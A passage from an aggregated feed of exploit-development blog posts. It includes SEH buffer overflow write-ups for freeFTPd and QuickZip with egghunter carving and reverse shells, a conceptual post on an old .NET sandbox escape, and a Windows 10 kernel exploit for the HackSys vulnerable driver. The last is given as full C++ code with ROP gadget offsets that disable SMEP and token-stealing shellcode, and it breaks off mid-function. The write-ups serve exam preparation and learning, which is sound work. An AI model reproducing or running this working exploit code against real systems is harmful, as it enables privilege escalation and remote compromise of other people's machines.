We send our exploit up and we have successfully redirected code execution as we hit our POP-POP-RET address.

We follow the POP-POP-RET and we hit our nSEH which is just right below our As

Note: We currently do not see our Ds.

...however, if we scroll further down, we can see that our Ds are still loaded in memory. Just need find them...aka. egghunter.

First Jump

Since our first jump is limited to just 4 bytes, we will do a 2 byte reverse short jmp

EB 80 or jmp short reverse 128 bytes.

We update our nSEH with EB 80 and added 2 more NOPs (not necessary) to complete the 4 bytes.

We fire up the POC on more time, take the pop-pop-ret, and hit our first jump

Restricted characters

After going through the 256 hex characters, we found that 0xa is the only restricted character

So far, we have accomplished the following:

1. Successfully crash the program and overwrite the SEH and nSEH

2. Calculated the offset values

3. Found POP-POP-RET address

4. Completed the first jump from nSEH which allows 127 bytes of address space

Egg...hunting!

Reminder...you can create an egghunter using mona.py

Note: I am using a slightly different egghunter shellcode.

We update our POC with our egghunter shellcode and add the egg in front of our Ds

Send the exploit up...take the first jump (EB 80) and we land on our NOP sled.

If we scroll down, our egghunter is just right below our the NOP sled.

We let the egghunter execute while adding a breakpoint at JMP EDI to check the value of EDI.

Here we can see that we have successfully located our egg...all that we need to do now is add our reverse shellcode right after our egg.

At this point we are ready to add our reverse shell

Final Proof-of-Concept: https://github.com/pyt3ra/freeFTPd-1.0.10-SEH-Based-Buffer-Overflow

PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more)

Winsider Seminars & Solutions Inc.

By: Yarden Shafir ＆#38； Alex Ionescu

12 May 2020 at 18:13

[…]

Pyt3ra Security Blogs
QuickZip 4.60 SEH Based Buffer Overflow w/ EgghunterYmir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science
10 May 2020 at 08:46

QuickZip 4.60 SEH Based Buffer Overflow w/ Egghunter

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

10 May 2020 at 08:46

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

Kali Linux

Windows Vista

QuickZip 4.60

Bug found by: corelancod3r (http://corelan.be:8800)

Software Link: http://www.quickzip.org/downloads.html

GitHub:https://github.com/pyt3ra/QuickZip_4_60_SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

This is another SEH based buffer overflow with an egghunter implementation. A more detailed explanation that I wrote about an egghunter implementation can be found here: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

You can find numerous write-ups about this vulnerability and exploit it. This buffer overflow vulnerability gives us a good mix of shellcode encoding due to restricted characters as well as how to implement an egghunter.

I'm doing this as part of my preparation of Offensive Security Certified Expert (OSCE) certification

0x0 - Setup

Our Proof-of-Concept creates a .zip file that we will access using QuickZip.

0x1 - Fuzzing

As usual, step one in exploit development is fuzzing. This allows us to examine how the program responds when we introduce a buffer (oversized) to it.

We will be using the fuzzer from corelan as shown below.

We examine the crash using immunity debugger and we can see that have successfully overwritten the SEH handler with 41s.

0x2 - Calculating the offset

We will utilize Metasploit's pattern_create.rb and pattern_offset.rb

First, we create unique characters of 4068 bytes and update our POC

We check the SEH chain after the crash to get the offset values

SEH: 6B41396A

nSEH: 41386A41

Second, we calculate these values using pattern_offset.rb

Finally, we update our POC and verify if these values are correct.

If everything is correct, we should see Bs at byte 294 and Cs at byte 298.

Our values are correct as we see the 43s and 42s overwrite both SEH and nSEH respectively.

0x3 - Verifying Restricted Characters

At this point, we are now ready to find an address to redirect the SEH handler. However, before we waste our time looking for an address, we will need to verify first if there are restricted characters.

First, I worked on the first 128 bytes (x01 to x7F)

I sent the characters to the program and carefully watching how the program responds to the characters. If it gets mangled/truncated/updated, then it's a bad character.

After numerous tries, I was able to narrow down the restricted characters to the following:

'\x10\x0f\x14\x15\x2f\x3d\x3a\x5b'

Updated POC below:

Second, I worked with the other 128 bytes (x80 to xff)

Interestingly, hex characters 80 and above are changed to an arbitrary hex character.

I sent the following characters...

...and we see the following conversion in Immunity Debugger

The table below shows the conversion (not a complete list).

0x4 - POP-PO-RET address!

Now that we know which characters are not allowed, we are ready to find a POP-POP-RET address.

Lucky for us, Immunity Debugger's mona.py module enables an easier way to find a POP-POP-RET address.

There were multiple addresses found.

Although not ideal since it has null bytes, we will be using address 00435133

We can verify that this is indeed a POP-POP-RET address by searching for it.

We can update our POC with this address and see if our SEH handler gets redirected to it.

Note that the address has to be in little-endian.

We fire up the POC and we have successfully redirected the SEH handler as shown below:

…once we take the pop-pop-ret, we then get redirected to our nseh values (EBs)

Note that our Ds are nowhere to be found now, however, our As are easily accessible which is just right above our nSEH. This means our initial jump will have to be a reverse jump to the beginning of our As that should get us at least 127 bytes of address space to further jump to a bigger space (Ds location)

0x5 - First Jump

Normally, we would be able to easily to a reverse jump short 80 (EB 80). However, note that any hex character of 80 or over is restricted and converts to a different hex character.

More info about jump shorts (forward and reverse) can be found here: https://thestarman.pcministry.com/asm/2bytejumps.htm

If we go back to our bad characters table…we can see that hex 89 and 9F translates to EB and 83 respectively.

89	EB
9F	83

Here's how the EB 83 instructions would work as shown in Immunity.

We can now update our POC with our first jump

We see our EB 83 first jump in SEH chain

We take the pop-pop-ret and we successfully hit our first jump…from 0012FBB0 to 0012FB35

0x6 - Second Jump - Egghunter

Remember that the address space for our Ds is missing now (still in memory). This is where ideally where reverse shellcode would be.

Note above that our dump doesn't show the address space where are Ds are close to our As.

Just because we can't find it doesn't mean it is missing…this is where an egghunter shellcode comes in to play.

Here's a write-up that I did about egghunter: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

Mona.py also has a module to create an egghunter.

Note: I will be using a different egghunter

Due to restricted characters, we will need to carve out our egghunter shellcode so I will be using the egghunter shellcode that I used for OSCE prep (I spent way too much time carving them).

Also, note that I did another EB 83 at the beginning of our second jump to allow another 120+ bytes of address space as I noticed that the first jump wasn't enough space

Before we can start carving out the egghunter shellcode, we will need to align the ESP to point to the space below our first EB 08 at address 0012FB8D--this is where our egghunter shellcode will be decoded.

We can see that ESP is currently pointed at 012F574 and we want to point to 0012FB8D

We will need to add 1561 to ESP

To align ESP, we need the following instructions:

PUSH ESP

POP EAX

ADD AX, 619

PUSH EAX

POP ESP

Keep in mind that we still need to avoid restricted characters...fortunately, the opcodes that correspond to these instructions are not restricted

We execute the following instructions and we can see that our ESP now points to 0012FB8D

Again, we update our POC with our initial ESP realignment which will be the beginning of our egghunter shellcode

With our ESP aligned to where we want it to point....we can start carving out our egghunter shellcode.

Here's the original egghunter shellcode broken down into 4 bytes

#original egg hunter shellcode

\x68\x81\xcA\xFF

\x0F\x42\x52\x6A

\x02\x58\xCD\x2E

\x3C\x05\x5A\x74

\xEF\xb8\x54\x30

\x30\x57\x8b\xFA

\xAF\x75\xea\xAF

\x75\xE7\xFF\xE7

We will be using the EAX register to carve out the egghunter. Note that we need to zero out EAX first before we execute SUB instructions. We start from the last 4 bytes and work our way up.

zero_out_eax = "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"

This whole carving thing is straight black magic...it never ceases to amaze me.

#\x75\xe7\xff\xe7

#using hex/dword in windows calc

#0 - E7FFE775 = 1800 188B

#7950 5109 + 7950 5109 + 255F7679 = 1800 188B

#0 - 07950 5109 - 79505109 - 255F7679 = E7FFE775

These 4 bytes are encoded by doing some SUB instructions on EAX, then it gets pushed to the stack, and then they get decoded at the ESP address.

We will be doing this for the other 28 bytes

#\xaf\x75\xea\xaf

#using hex/dword in windows calc

#0 - AFEA75AF = 5015 8A51

#71094404 + 71094404 + 6E03 0249‬ = 5015 8A51

#0 - 71094404 - 71094404 - 6E03 0249 = AFEA75AF

\x30\x57\x8b\xfa

#using hex/dword in windows calc

#0 - FA8B 5730 = 0574 A8D0‬

#55093131 + 55093131 + 5B62 466E = 0574 A8D0‬

#0 - 55093131 - 55093131 - 5B62 466E = FA8B 5730

\xef\xb8\x54\x30

#using hex/dword in windows calc

#0 - 3054 B8EF = CFAB 4711

#56316666 +56316666 + 2348 7A45 = CFAB 4711

#0 - 56316666 - 56316666 - 2348 7A45 = 3054 B8EF

At this point, we have successfully carved out the first 16 bytes of our egghunter shellcode.

Note that we are getting close our second EB 83 jmp…we will need to jump over this to get to the next 127 bytes of address space

I made a mistake on the ESP realignment that resulted in wasted address space. ESP should have been pointed to the end of our 41s as the stack grows bigger, the address becomes smaller.

This means we need ESP to be pointing at address 0012FBAC

Adjusted ESP alignment

This gives us about extra 32 bytes of address space….every byte counts!

We finish up the first 128 bytes by adding the first half of our zero_out_eax instructions and adding a jump short 10 bytes to go over the second EB 83 (I think we could have looped around too and just overwrite the first 16 bytes of our egghunter shellcode).

Our jump short brings us from address 0012FB2F to 0012FB3B and we successfully get over the second EB 83

Now we continue encoding the rest of our egghunter shellcode

#\x3c\x05\x5a\x74

#using hex/dword in windows calc

#0 - 745A053C = 8BA5 FAC4

#41214433 + 41214433 + 0963 725E = 8BA5 FAC4

#0 - 41214433 - 41214433 - 0963 725E = 745A053C

#\x02\x58\xcd\x2e

#using hex/dword in windows calc

#0 - 2ECD5802 = D132 A7FE

#657F3165 + 657F3165 + 06344534 = D132 A7FE

#0 - 657F3165 - 657F3165 - 06344534 = 2ECD5802

Finally, we hit our last 4 bytes

That completes our egghunter shellcode…with literally 6 bytes left to spare with our address space

To test if our egghunter can find our egg, we add our egg "T00W" to the beginning of our Ds…and see if we can find it

...and we are successful. We found our Ds address space.

0x7 - Shellcode time!

I created a calc shellcode to see if we are able to pop a shellcode.

We go through our egghunter and add a breakpoint right before the jmp edi instruction and we can see that edi points to the beginning of our calc shellcode

Everything looks good, however, our shellcode just keeps on crashing the program and not spawn a calc.exe

After spending research, it looks like the ESP has to be realigned.

We align ESP with the address of EDX....then make it divisible by 4

PUSH EDX

POP ESP

AND, ESP FFFFFFF0 ----> make ESP divisible by 4

I update the shellcode to a reverse shell…pop the exploit one more time and we get a reverse shell

Final POC in my GitHub.

Thanks for reading!

Tyranid's Lair
Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)tiraniddo
7 May 2020 at 23:12

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

Tyranid's Lair

By: tiraniddo

7 May 2020 at 23:12

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers,
dynamic methods or methods outside the delegate creator's assembly.

I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.

The Summer of PWN

The Human Machine Interface

By: h0mbre

5 May 2020 at 04:00

Summer Plans

Now that I finished the HEVD series of posts, it’s time for me to switch gears. The series became more of a chore as I progressed and the excercise felt quite silly for a few reasons. Primarily, there are still so many fundamental binary exploitation concepts that I still don’t know. Why was I spending so much time on very esoteric material when I haven’t even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I get to focus now on going back to the basics.

For the forseeable future, I’m going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so those trying accomplish similar goals can see what I tried. I’ll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

The Human Machine Interface
HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypassh0mbre
4 May 2020 at 04:00

HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass

The Human Machine Interface

By: h0mbre

4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. This was all of the exploits I wanted to hit when I started this goal in late January. We did quite a few, there are some definitely interesting ones left on the table and there is all of the Linux exploits as well. I’ll speak more about future posts in a future post (haha). I used Hacksys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking this technique.

All of the exploit code can be found here.

Thanks

To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I’ve said every post so far, nothing I was doing is my own idea or technique, was simply recreating their exploits (or at least trying to) in order to learn more about the bug classes and learn more about the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects kernel mode code running in userspace stops us from being able to hijack execution in the kernel and send it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

20 SMEP Supervisor Mode Execution Protection Enable If set, execution of code in a higher ring generates a fault.

So the 20th bit of the CR4 indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.

Getting Kernel Base Address

The first thing we want to do, is to get the base address of the kernel. If we don’t get the base address, we can’t figure out what the offsets are to our gadgets that we want to use to bypass ASLR. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We need a way also to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing google searches with some syntax like: site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 in order to use this API your process requires some level of elevation. But, I had already used the API previously and was quite fond of it for giving me so much trouble the first time I used it to get the kernel base address and wanted to use it again but this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123’s HEVD exploits, I was able to get the API exported to my exploit code and was able to use it effectively. I won’t go too much into the code here, but this is the function and the typedefs it references to retrieve the base address to the kernel for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG				 Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from nt.dll and allows us to use it with the System Module Information parameter which returns to us a nice struct of a ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves which have a lot of struct members included a Name. In all my research I couldn’t find an example where the kernel image wasn’t index value 0 so that’s what I’ve implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

Again, just following along with Abatchy’s blog, we can find Gadget 1 (actually the 2nd in our code) by locating a gadget that allows us to place a value into cr4 easily and then takes a ret soon after. Luckily for us, this gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this:

pop rcx

ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

So with these two gadgets locations known to us, as in, we know their offsets relative to the kernel base, we can now implement them in our code. So to be clear, our payload that we’ll be sending will look like this when we overwrite the stack:

‘A’ characters * 2056
our pop rcx gadget
The value we want rcx to hold
our mov cr4, rcx gadget
pointer to our shellcode.

So for those following along at home, we will overwrite rip with our first gadget, it will pop the first 8 byte value on the stack into rcx. What value is that? Well, it’s the value that we want cr4 to hold eventually and we can simply place it onto the stack with our stack overflow. So we will pop that value into rcx and then the gadget will hit a ret opcode which will send the rip to our second gadget which will mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. The gadget will then hit a ret opcode and return rip to where? To a pointer to our userland shellcode that it will now run seemlessly because SMEP is disabled.

You can see this implemented in code here:

 BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

CR4 Value

Again, just following along with Abatchy, I’ll go ahead and place the value 0x70678 into cr4. In binary, 1110000011001111000 which would mean that the 20th bit, the SMEP bit, is set to 0. You can read more about what values to input here on j00ru’s blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode is done running (not really my shellcode, its borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you’re using and also perhaps what build of Windows you’re on as the some of the kernel routines will change, so I won’t go too much in depth here. But, what I did to figure out why I kept crashing so much after returning to the address in the screenshot of HEVD!IrpDeviceIoCtlHandler+0x19f which is located in the right hand side of the screenshot at ffff9e8196b99158, is that rsi is typically zero’d out if you send regular sized buffers to the driver routine.

So if you were to send a non-overflowing buffer, and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would return if we took a ret out our address of ffff9e8196b99158), you would see that rsi is typically 0 when normally system service routines are exiting so when I returned, I had to have an rsi value of 0 in order to stop from getting an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn’t too complicated, this could even serve as introduction to ROP chains for some in my opinion because as far as ROP chains go this is fairly straightforward; however, restoring execution after our shellcode was a nightmare for me. A lot of time wasted by misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

FuzzySec
r0oki7
Tekwizz123
Abatchy
everyone else I’ve referenced in previous posts!

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
